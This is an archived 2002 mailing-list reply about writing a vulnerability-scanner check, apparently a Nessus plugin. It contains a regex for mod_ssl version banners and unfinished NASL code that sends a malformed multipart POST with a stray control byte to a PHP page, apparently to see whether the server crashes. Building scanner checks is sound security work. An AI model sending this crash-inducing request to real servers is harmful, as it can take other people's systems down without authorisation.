On Wednesday 06 March 2002 02:24 am, Renaud Deraison wrote:
> That one was already written by Thomas Reinke (see the plugins page for
> info). I'd be interested in actually testing for the flaw, that'd be
> better and more reliable (my servers have ServerToken = ProductOnly, so
> they would not be tested).
Cool, didnt see it, I usually just check the CVS tree.
> > if( egrep(pattern:"(.*mod_ssl/[1-2].[0-8].[0-6])",string:banner))
>
> Seems wrong to me. It will match on version 1.1.6 but not on 1.9.7.
>
> I think the following would be better :
>
> .*mod_ssl/((1..*)|(2\.([0-7]\.[0-9]*)|(8\.[0-6]))).*
Much better, I knew I sucked at regular expressions. Heres some code to work
with, I will try to finish it up later. The two sticking points are finding a
php page and how long to wait for a response before determining the server is
dead.
php_page = "/index.php";
boundary1 = string("-NESSUS!");
boundary2 = string("--NESSUS!");
clen = "567";
dblq = raw_string(0x22);
badb = raw_string(0x12);
postdata = string("POST /", php_page, " HTTP/1.0\n");
postdata = string(postdata, "Referer: http://", get_host_name(), "/",
php_page, "\n");
postdata = string(postdata, "Content-type: multipart/form-data; boundary=",
boundary1, "\n");
postdata = string(postdata, "Content-Length: ", clen, "\n\n", boundary2,
"\n");
postdata = string(postdata, "Content-Disposition: form-data; name=");
postdata = string(postdata, dblq, badb, dblq);
port = 80;
soc = open_sock_tcp(port);
send(socket:soc, data:postdata);
r = recv(socket:soc, length:512);
This archive was generated by hypermail 2b30 : Wed Mar 06 2002 - 01:14:04 PST